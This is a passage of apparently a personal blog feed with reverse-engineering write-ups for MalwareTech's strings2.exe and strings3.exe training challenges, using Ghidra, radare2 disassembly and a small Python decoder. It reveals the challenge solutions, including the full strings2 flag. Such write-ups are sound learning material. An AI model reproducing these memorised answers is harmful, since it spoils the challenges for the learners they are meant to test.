ghidra even populated the flag in the disassembly view, lets pretend we didnt see that and find it ourselves.</p> <p>The decompiled code gives us a much better idea of what is happening:</p> <div class="language-c# highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="k">void</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="p">*</span><span class="n">lpText</span><span class="p">;</span> <span class="n">LPSTR</span> <span class="n">local_4a4</span><span class="p">;</span> <span class="n">MD5</span> <span class="n">local_9c</span> <span class="p">[</span><span class="m">144</span><span class="p">];</span> <span class="n">HRSRC</span> <span class="n">local_c</span><span class="p">;</span> <span class="n">UINT</span> <span class="n">flag_resource_id</span><span class="p">;</span> <span class="nf">MD5</span><span class="p">(</span><span class="n">local_9c</span><span class="p">);</span> <span class="n">local_4a4</span><span class="p">.</span><span class="n">_0_1_</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="nf">memset</span><span class="p">((</span><span class="k">void</span> <span class="p">*)((</span><span class="kt">int</span><span class="p">)&amp;</span><span class="n">local_4a4</span> <span class="p">+</span> <span class="m">1</span><span class="p">),</span><span class="m">0</span><span class="p">,</span><span class="m">0x3ff</span><span class="p">);</span> <span class="n">flag_resource_id</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">local_c</span> <span class="p">=</span> <span class="nf">FindResourceA</span><span class="p">((</span><span class="n">HMODULE</span><span class="p">)</span><span class="m">0x0</span><span class="p">,</span><span class="s">"rc.rc"</span><span class="p">,(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="m">0x6</span><span class="p">);</span> <span class="n">flag_resource_id</span> <span class="p">=</span> <span class="m">0x110</span><span class="p">;</span> <span class="nf">LoadStringA</span><span class="p">((</span><span class="n">HINSTANCE</span><span class="p">)</span><span class="m">0x0</span><span class="p">,</span><span class="m">0x110</span><span class="p">,(</span><span class="n">LPSTR</span><span class="p">)&amp;</span><span class="n">local_4a4</span><span class="p">,</span><span class="m">0x3ff</span><span class="p">);</span> <span class="n">lpText</span> <span class="p">=</span> <span class="nf">digestString</span><span class="p">(</span><span class="n">local_9c</span><span class="p">,(</span><span class="kt">char</span> <span class="p">*)&amp;</span><span class="n">local_4a4</span><span class="p">);</span> <span class="nf">MessageBoxA</span><span class="p">((</span><span class="n">HWND</span><span class="p">)</span><span class="m">0x0</span><span class="p">,</span><span class="n">lpText</span><span class="p">,</span><span class="s">"We\'ve been compromised!"</span><span class="p">,</span><span class="m">0x30</span><span class="p">);</span> <span class="nf">ExitProcess</span><span class="p">(</span><span class="m">0</span><span class="p">);</span> <span class="k">return</span> <span class="m">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>So now we have the string identifier <code class="language-plaintext highlighter-rouge">flag_resource_id = 0x110;</code> which matches what we computed from the assembly code above. Lets check out our resources to see what we can find out. Clicking on .rsrc in the program tree to open the resources shows much more promise:</p> <p><img src="https://bizarrechaos.com/attachments/strings3-ghidra-resources.png" alt="" /></p> <p>Scrolling through the resources we see that they ghidra has correctly parsed out our resource strings, and a bit of scrolling later we come across 272. Flag acquired!</p> <p>This was definitely the toughest challenge thusfar. My methodolgy could use some optimizing, hopefully that comes as I become more familiar with things. More to come soon!</p> Sat, 22 Jun 2019 20:40:00 +0000 https://bizarrechaos.com/posts/MalwareTechChallenge_strings3.exe/ https://bizarrechaos.com/posts/MalwareTechChallenge_strings3.exe/ mtchallenge tools re posts MalwareTech Challenge - strings2.exe <p>I have been teaching myself to reverse engineer binary programs so that I can use these skills to reverse engineer malware. I have been learning assembly code, and playing with new tools such as ghidra and radare2/cutter.</p> <p>I found that <a href="https://twitter.com/MalwareTechBlog">@MalwareTech</a> had some great binary analysis challenges on his blog and decided to check them out.</p> <p>This write up covers the second challenge strings2.exe: <a href="https://www.malwaretech.com/strings2">‘https://www.malwaretech.com/strings2’</a></p> <p>Lets open this binary in cutter and analyze it with radare2. Once open lets navigate to the entry fucntion:</p> <p><img src="https://bizarrechaos.com/attachments/strings2-cutter.png" alt="" /></p> <p>Right away, just as in the first challenge, it looks like we have the flag. This time it has been initialized as a stack string. Lets take a look at the assembly:</p> <pre><code class="language-assembly">(fcn) entry0 200 | entry0 (); | ; var int32_t var_28h @ ebp-0x28 | ; var int32_t var_27h @ ebp-0x27 | ; var int32_t var_26h @ ebp-0x26 | ; var int32_t var_25h @ ebp-0x25 | ; var int32_t var_24h @ ebp-0x24 | ; var int32_t var_23h @ ebp-0x23 | ; var int32_t var_22h @ ebp-0x22 | ; var int32_t var_21h @ ebp-0x21 | ; var int32_t var_20h @ ebp-0x20 | ; var int32_t var_1fh @ ebp-0x1f | ; var int32_t var_1eh @ ebp-0x1e | ; var int32_t var_1dh @ ebp-0x1d | ; var int32_t var_1ch @ ebp-0x1c | ; var int32_t var_1bh @ ebp-0x1b | ; var int32_t var_1ah @ ebp-0x1a | ; var int32_t var_19h @ ebp-0x19 | ; var int32_t var_18h @ ebp-0x18 | ; var int32_t var_17h @ ebp-0x17 | ; var int32_t var_16h @ ebp-0x16 | ; var int32_t var_15h @ ebp-0x15 | ; var int32_t var_14h @ ebp-0x14 | ; var int32_t var_13h @ ebp-0x13 | ; var int32_t var_12h @ ebp-0x12 | ; var int32_t var_11h @ ebp-0x11 | ; var int32_t var_10h @ ebp-0x10 | ; var int32_t var_fh @ ebp-0xf | ; var int32_t var_eh @ ebp-0xe | ; var int32_t var_dh @ ebp-0xd | ; var int32_t var_ch @ ebp-0xc | ; var int32_t var_bh @ ebp-0xb | ; var int32_t var_ah @ ebp-0xa | ; var int32_t var_9h @ ebp-0x9 | ; var int32_t var_8h @ ebp-0x8 | ; var int32_t var_7h @ ebp-0x7 | ; var int32_t var_6h @ ebp-0x6 | ; var int32_t var_5h @ ebp-0x5 | ; var LPCSTR lpText @ ebp-0x4 | 0x004022b0 push ebp | 0x004022b1 mov ebp, esp | 0x004022b3 sub esp, 0x28 ; '(' | 0x004022b6 mov byte [var_28h], 0x46 ; 'F' ; 70 | 0x004022ba mov byte [var_27h], 0x4c ; 'L' ; 76 | 0x004022be mov byte [var_26h], 0x41 ; 'A' ; 65 | 0x004022c2 mov byte [var_25h], 0x47 ; 'G' ; 71 | 0x004022c6 mov byte [var_24h], 0x7b ; '{' ; 123 | 0x004022ca mov byte [var_23h], 0x53 ; 'S' ; 83 | 0x004022ce mov byte [var_22h], 0x54 ; 'T' ; 84 | 0x004022d2 mov byte [var_21h], 0x41 ; 'A' ; 65 | 0x004022d6 mov byte [var_20h], 0x43 ; 'C' ; 67 | 0x004022da mov byte [var_1fh], 0x4b ; 'K' ; 75 | 0x004022de mov byte [var_1eh], 0x2d ; '-' ; 45 | 0x004022e2 mov byte [var_1dh], 0x53 ; 'S' ; 83 | 0x004022e6 mov byte [var_1ch], 0x54 ; 'T' ; 84 | 0x004022ea mov byte [var_1bh], 0x52 ; 'R' ; 82 | 0x004022ee mov byte [var_1ah], 0x49 ; 'I' ; 73 | 0x004022f2 mov byte [var_19h], 0x4e ; 'N' ; 78 | 0x004022f6 mov byte [var_18h], 0x47 ; 'G' ; 71 | 0x004022fa mov byte [var_17h], 0x53 ; 'S' ; 83 | 0x004022fe mov byte [var_16h], 0x2d ; '-' ; 45 | 0x00402302 mov byte [var_15h], 0x41 ; 'A' ; 65 | 0x00402306 mov byte [var_14h], 0x52 ; 'R' ; 82 | 0x0040230a mov byte [var_13h], 0x45 ; 'E' ; 69 | 0x0040230e mov byte [var_12h], 0x2d ; '-' ; 45 | 0x00402312 mov byte [var_11h], 0x42 ; 'B' ; 66 | 0x00402316 mov byte [var_10h], 0x45 ; 'E' ; 69 | 0x0040231a mov byte [var_fh], 0x53 ; 'S' ; 83 | 0x0040231e mov byte [var_eh], 0x54 ; 'T' ; 84 | 0x00402322 mov byte [var_dh], 0x2d ; '-' ; 45 | 0x00402326 mov byte [var_ch], 0x53 ; 'S' ; 83 | 0x0040232a mov byte [var_bh], 0x54 ; 'T' ; 84 | 0x0040232e mov byte [var_ah], 0x52 ; 'R' ; 82 | 0x00402332 mov byte [var_9h], 0x49 ; 'I' ; 73 | 0x00402336 mov byte [var_8h], 0x4e ; 'N' ; 78 | 0x0040233a mov byte [var_7h], 0x47 ; 'G' ; 71 | 0x0040233e mov byte [var_6h], 0x53 ; 'S' ; 83 | 0x00402342 mov byte [var_5h], 0x7d ; '}' ; 125 | 0x00402346 lea eax, [var_28h] | 0x00402349 push eax | 0x0040234a call sym.plaintext2.exe__md5_hash__YAPADPAD_Z | 0x0040234f add esp, 4 | 0x00402352 mov dword [lpText], eax | 0x00402355 push 0x30 ; '0' ; 48 ; UINT uType | 0x00402357 push str.We_ve_been_compromised ; 0x403020 ; "We've been compromised!" ; LPCSTR lpCaption | 0x0040235c mov ecx, dword [lpText] | 0x0040235f push ecx ; LPCSTR lpText | 0x00402360 push 0 ; HWND hWnd | 0x00402362 call dword [sym.imp.USER32.dll_MessageBoxA] ; 0x403008 ; int MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) | 0x00402368 push 0 ; UINT uExitCode | 0x0040236a call dword [sym.imp.KERNEL32.dll_ExitProcess] ; 0x403000 ; void ExitProcess(UINT uExitCode) | 0x00402370 xor eax, eax | 0x00402372 mov esp, ebp | 0x00402374 pop ebp \ 0x00402375 ret 0x10 </code></pre> <p>Here we see the stack being initialized and then we see multiple <code class="language-plaintext highlighter-rouge">mov byte...</code> lines. This is where the flag is being addressed in memory byte by byte. We are then loading the address of the first byte into eax <code class="language-plaintext highlighter-rouge">lea eax, [var_28h]</code> and pushing it to the stack. Next a function is called that seems to compute an MD5 hash. When ran this binary will hash the flag and spit out the MD5 value.</p> <p>All we have to do for this one is pull the flag out of the stack string and we have our flag. radare2 automatically converts the hex to ascii in a comment next to the instruction so it is easy to extract. However this could also be done programatically with python if needed:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">stack_string</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x46</span><span class="p">,</span> <span class="mh">0x4c</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x7b</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x43</span><span class="p">,</span> <span class="mh">0x4b</span><span class="p">,</span> <span class="mh">0x2d</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x2d</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x2d</span><span class="p">,</span> <span class="mh">0x42</span><span class="p">,</span> <span class="mh">0x45</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x2d</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x54</span><span class="p">,</span> <span class="mh">0x52</span><span class="p">,</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x53</span><span class="p">,</span> <span class="mh">0x7d</span><span class="p">]</span> <span class="n">ascii_string</span> <span class="o">=</span> <span class="s">''</span> <span class="k">for</span> <span class="n">byte</span> <span class="ow">in</span> <span class="n">stack_string</span><span class="p">:</span> <span class="n">ascii_string</span> <span class="o">=</span> <span class="n">ascii_string</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="n">byte</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">ascii_string</span><span class="p">)</span> </code></pre></div></div> <p>In the above code all we are doing is creating a list of bytes which is effectively just like the stack string in the assembly code. We then iterate through this list and use the chr() method to get the string character from the provided unicode code point (the current byte). That string is then added to the end result “ascii_string” and it is printed to the console when the loop exits. We can then take this flag, plug it into MalwareTech’s site, and voila! strings2.exe complete!</p> Fri, 21 Jun 2019 19:35:00 +0000 https://bizarrechaos.com/posts/MalwareTechChallenge_strings2.exe/ https://bizarrechaos.com/posts/MalwareTechChallenge_strings2.exe/ mtchallenge tools re posts